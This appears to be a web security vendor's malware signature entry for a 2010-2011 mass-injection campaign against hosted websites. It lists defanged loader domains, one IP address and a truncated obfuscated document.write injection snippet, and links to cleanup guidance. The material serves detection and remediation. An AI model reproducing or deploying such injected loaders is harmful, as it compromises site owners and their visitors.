Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.rks_injection.1

Description: Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011

Loads malware from (all of them pointing to 91.193.194.155)

hxxp://google-analytisc[.]co.cc
hxxp://oiwdd[.]co.cc
hxxp://pojdue[.]co.cc
hxxp://js-o-kcjh[.]cz.cc/21

Typical injected code

document​.write(unescape​('%3C​%73%63%72%69%70%74%20%73%72...

It infects PHP or javascript files.

Related links: http://blog.sucuri.net/2011/01/malware-update-co-cc.html


Affecting: WordPress websites.

Mitigation
How to clean a hacked WordPress site


For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb